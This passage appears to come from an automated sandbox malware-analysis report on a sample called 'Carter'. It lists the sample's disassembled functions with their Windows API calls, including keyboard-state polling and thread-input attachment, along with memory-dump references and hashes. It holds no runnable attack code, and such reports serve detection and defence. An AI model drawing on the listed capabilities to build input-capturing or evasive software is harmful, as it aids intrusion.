                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01067B9D
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 01067BA5
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 01067BB0
                                                                        • DeleteDC.GDI32(00000000), ref: 01067BB9
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 01067BC3
                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 01067BD7
                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 01067BE3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                        • String ID: static
                                                                        • API String ID: 2559357485-2160076837
                                                                        • Opcode ID: dbd57fe324c6f233a8f2c7751f8a8255c8e4e9e2e2f60a44ff9fc589bb47b0d7
                                                                        • Instruction ID: 1a1cdee98c94332cb53dba13c0a77c693ef45c1f643ae4cc6aad7caef72075cf
                                                                        • Opcode Fuzzy Hash: dbd57fe324c6f233a8f2c7751f8a8255c8e4e9e2e2f60a44ff9fc589bb47b0d7
                                                                        • Instruction Fuzzy Hash: B1316F31500219ABEF229F64DC48FDB3BADFF0A764F100315FA95A6194C736D810DBA4
                                                                        Function 01007030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0100706B
                                                                          • Part of subcall function 01008D58: __getptd_noexit.LIBCMT ref: 01008D58
                                                                        • __gmtime64_s.LIBCMT ref: 01007104
                                                                        • __gmtime64_s.LIBCMT ref: 0100713A
                                                                        • __gmtime64_s.LIBCMT ref: 01007157
                                                                        • __allrem.LIBCMT ref: 010071AD
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010071C9
                                                                        • __allrem.LIBCMT ref: 010071E0
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010071FE
                                                                        • __allrem.LIBCMT ref: 01007215
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01007233
                                                                        • __invoke_watson.LIBCMT ref: 010072A4
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                        • String ID:
                                                                        • API String ID: 384356119-0
                                                                        • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                        • Instruction ID: d97b4d2acf197fd1e0681b3315fed1a04394cc75fc0c281e9e6764114266849e
                                                                        • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                        • Instruction Fuzzy Hash: B571B571A00B07ABF716DE7DCC40B9AB7E9BF54224F14426AF6D4D62C1E778E9408790
                                                                        Function 01042CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 01042CE9
                                                                        • GetMenuItemInfoW.USER32(010A7890,000000FF,00000000,00000030), ref: 01042D4A
                                                                        • SetMenuItemInfoW.USER32(010A7890,00000004,00000000,00000030), ref: 01042D80
                                                                        • Sleep.KERNEL32(000001F4), ref: 01042D92
                                                                        • GetMenuItemCount.USER32(?), ref: 01042DD6
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 01042DF2
                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 01042E1C
                                                                        • GetMenuItemID.USER32(?,?), ref: 01042E61
                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01042EA7
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01042EBB
                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01042EDC
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                        • String ID:
                                                                        • API String ID: 4176008265-0
                                                                        • Opcode ID: d570df7f4bf07ba1792dd1286b2f39903b877d6ca83f23bf7f348a6027ad132a
                                                                        • Instruction ID: 7ead78f971811e3c421402cf8953414d6b8dcb3a574b0941f3a0eef77341c896
                                                                        • Opcode Fuzzy Hash: d570df7f4bf07ba1792dd1286b2f39903b877d6ca83f23bf7f348a6027ad132a
                                                                        • Instruction Fuzzy Hash: 0C61C3F0A00249AFEB31DF59E8C4ABF7BB8EB01304F1441A9F9C1A7245D776A905CB21
                                                                        Function 01067548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 010675CA
                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 010675CD
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 010675F1
                                                                        • _memset.LIBCMT ref: 01067602
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01067614
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0106768C
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow_memset
                                                                        • String ID:
                                                                        • API String ID: 830647256-0
                                                                        • Opcode ID: cd1b5b8741f4e7e324c9c96b1c707a353c2a68e3210a3570dc8a7c3cca9f3ed3
                                                                        • Instruction ID: 0705223bb07c452d98f5140ee70ad4f98f111f0b4fda26c90888cd1775c32a7f
                                                                        • Opcode Fuzzy Hash: cd1b5b8741f4e7e324c9c96b1c707a353c2a68e3210a3570dc8a7c3cca9f3ed3
                                                                        • Instruction Fuzzy Hash: 21617C75900208AFDB21DFA8CC80EEE77F8FB09714F104199FA94A7291D775AE41DBA0
                                                                        Function 010377B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 010377DD
                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 01037836
                                                                        • VariantInit.OLEAUT32(?), ref: 01037848
                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 01037868
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 010378BB
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 010378CF
                                                                        • VariantClear.OLEAUT32(?), ref: 010378E4
                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 010378F1
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 010378FA
                                                                        • VariantClear.OLEAUT32(?), ref: 0103790C
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 01037917
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                        • String ID:
                                                                        • API String ID: 2706829360-0
                                                                        • Opcode ID: c1f35d3adc567ae5d3213ed425300e7cf1df679780fb81fa4ca2089a712e1bb5
                                                                        • Instruction ID: eeaa2403a13335e0775bc4436c72c4295a1b7a149c32130cd05c6ed1f2fa2c22
                                                                        • Opcode Fuzzy Hash: c1f35d3adc567ae5d3213ed425300e7cf1df679780fb81fa4ca2089a712e1bb5
                                                                        • Instruction Fuzzy Hash: 244163B5E00119EFCB10DFA8C8489EDBBB9FF48314F008169F995A7255CB35AA45CFA0
                                                                        Function 01040508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 01040530
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 010405B1
                                                                        • GetKeyState.USER32(000000A0), ref: 010405CC
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 010405E6
                                                                        • GetKeyState.USER32(000000A1), ref: 010405FB
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 01040613
                                                                        • GetKeyState.USER32(00000011), ref: 01040625
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0104063D
                                                                        • GetKeyState.USER32(00000012), ref: 0104064F
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 01040667
                                                                        • GetKeyState.USER32(0000005B), ref: 01040679
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: a070eb1942509d4b00da847cfe8938e05c5198d6243c86500a547defd82d3550
                                                                        • Instruction ID: f1d80110f23c486deccfac3b0b89d0688b50243e2fcea8661c80242fa91feb29
                                                                        • Opcode Fuzzy Hash: a070eb1942509d4b00da847cfe8938e05c5198d6243c86500a547defd82d3550
                                                                        • Instruction Fuzzy Hash: 0141DBB09047CA6FFFB1966884843F6BEE0AB45304F0441E9FBC6661CBD6A991C4C7D1
                                                                        Function 01058AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                        • CoInitialize.OLE32 ref: 01058AED
                                                                        • CoUninitialize.OLE32 ref: 01058AF8
                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,01073BBC,?), ref: 01058B58
                                                                        • IIDFromString.OLE32(?,?), ref: 01058BCB
                                                                        • VariantInit.OLEAUT32(?), ref: 01058C65
                                                                        • VariantClear.OLEAUT32(?), ref: 01058CC6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                        • API String ID: 834269672-1287834457
                                                                        • Opcode ID: 228c3a63301bba2cf44bf4e33841169b98e8c7e5288ec70d64b22060f0104fb3
                                                                        • Instruction ID: 57735d014ce2e549ab757e6e0d3093c68268401bb43ecb061f92d7eb2401987f
                                                                        • Opcode Fuzzy Hash: 228c3a63301bba2cf44bf4e33841169b98e8c7e5288ec70d64b22060f0104fb3
                                                                        • Instruction Fuzzy Hash: B0618CB06047059FE750DF16C888A6FBBE8AF85714F00894EFDC59B291D774E944CB92
                                                                        Function 0104BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0104BB13
                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0104BB89
                                                                        • GetLastError.KERNEL32 ref: 0104BB93
                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0104BC00
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                        • API String ID: 4194297153-14809454
                                                                        • Opcode ID: 59d0a2bbb939308ef40d5e7431fc48211f93b5d54f91a692109de9787cd54de0
                                                                        • Instruction ID: 3d3a50765bc3b0d8106750bd848aba15edb1581e227a85b35dbb76607fc40c8c
                                                                        • Opcode Fuzzy Hash: 59d0a2bbb939308ef40d5e7431fc48211f93b5d54f91a692109de9787cd54de0
                                                                        • Instruction Fuzzy Hash: C831D475A002099FDB20DF69CC95EBDBBB8FF44310F048169E985EB299DBB5D901CB90
                                                                        Function 01039B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                          • Part of subcall function 0103B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0103B7BD
                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 01039BCC
                                                                        • GetDlgCtrlID.USER32 ref: 01039BD7
                                                                        • GetParent.USER32 ref: 01039BF3
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 01039BF6
                                                                        • GetDlgCtrlID.USER32(?), ref: 01039BFF
                                                                        • GetParent.USER32(?), ref: 01039C1B
                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 01039C1E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 1536045017-1403004172
                                                                        • Opcode ID: 0c6df30d581c99b3657b0356ca3ef4e517b3b3fb04c8b4f194c5a04175426efe
                                                                        • Instruction ID: b83a98047f71fb178c32e05d0a1cd6ecaa96cb9d6067f284eba0b0715e6ec097
                                                                        • Opcode Fuzzy Hash: 0c6df30d581c99b3657b0356ca3ef4e517b3b3fb04c8b4f194c5a04175426efe
                                                                        • Instruction Fuzzy Hash: 7621C170E00108AFDF14EB64CC95EFEBBB9EF9A310F104255F9A1A72E5DB7948149B20
                                                                        Function 01039D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32 ref: 01039D27
                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 01039D3C
                                                                        • _wcscmp.LIBCMT ref: 01039D4E
                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 01039DC9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                        • API String ID: 1704125052-3381328864
                                                                        • Opcode ID: 83b9dafc4cf6e2974856baeaef8adc86a0d44fc6d585f5659fa8e722b6b495df
                                                                        • Instruction ID: fbcb6d2ea0ca703ec73e058651e9f35142dd7d5be71e568f6d2bc3f8b039ca90
                                                                        • Opcode Fuzzy Hash: 83b9dafc4cf6e2974856baeaef8adc86a0d44fc6d585f5659fa8e722b6b495df
                                                                        • Instruction Fuzzy Hash: 3511E776748303BEFB123625EC1BDE773ACEB45724F200156F980A90D5FBA659115A50
                                                                        Function 01058F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 01058FC1
                                                                        • CoInitialize.OLE32(00000000), ref: 01058FEE
                                                                        • CoUninitialize.OLE32 ref: 01058FF8
                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 010590F8
                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 01059225
                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01073BDC), ref: 01059259
                                                                        • CoGetObject.OLE32(?,00000000,01073BDC,?), ref: 0105927C
                                                                        • SetErrorMode.KERNEL32(00000000), ref: 0105928F
                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0105930F
                                                                        • VariantClear.OLEAUT32(?), ref: 0105931F
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                        • String ID:
                                                                        • API String ID: 2395222682-0
                                                                        • Opcode ID: 94b0c1c8680d68f2323205dcf39af2c2c479b48090e774c48bfc6ac918de807e
                                                                        • Instruction ID: 56d42a48d24401abec3ace75205d7d102be0063b082935aa84e5d33859004600
                                                                        • Opcode Fuzzy Hash: 94b0c1c8680d68f2323205dcf39af2c2c479b48090e774c48bfc6ac918de807e
                                                                        • Instruction Fuzzy Hash: F5C12171608305EFD780DF69C88496BBBE9BF89748F00495DF98A9B251CB31ED05CB92
                                                                        Function 010419CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 010419EF
                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,01040A67,?,00000001), ref: 01041A03
                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 01041A0A
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01040A67,?,00000001), ref: 01041A19
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 01041A2B
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01040A67,?,00000001), ref: 01041A44
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01040A67,?,00000001), ref: 01041A56
                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,01040A67,?,00000001), ref: 01041A9B
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01040A67,?,00000001), ref: 01041AB0
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01040A67,?,00000001), ref: 01041ABB
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                        • String ID:
                                                                        • API String ID: 2156557900-0
                                                                        • Opcode ID: f37074505799f5ce8216016d3d2dfb3f8a02198b7cd007e92b90cebe078e5cb3
                                                                        • Instruction ID: 3e1672902d072a59352fe59191bc1fe70c353c60bf9f3bc7fcf5285e6845d49d
                                                                        • Opcode Fuzzy Hash: f37074505799f5ce8216016d3d2dfb3f8a02198b7cd007e92b90cebe078e5cb3
                                                                        • Instruction Fuzzy Hash: 1031E5B1500204BFEB71DF18DC84B697BFEEB55316F108166FB80D6189D7BAB9908B10
                                                                        Function 0101C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSysColor.USER32(00000008), ref: 00FE260D
                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00FE2617
                                                                        • SetBkMode.GDI32(?,00000001), ref: 00FE262C
                                                                        • GetStockObject.GDI32(00000005), ref: 00FE2634
                                                                        • GetClientRect.USER32(?), ref: 0101C0FC
                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0101C113
                                                                        • GetWindowDC.USER32(?), ref: 0101C11F
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0101C12E
                                                                        • ReleaseDC.USER32(?,00000000), ref: 0101C140
                                                                        • GetSysColor.USER32(00000005), ref: 0101C15E
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                        • String ID:
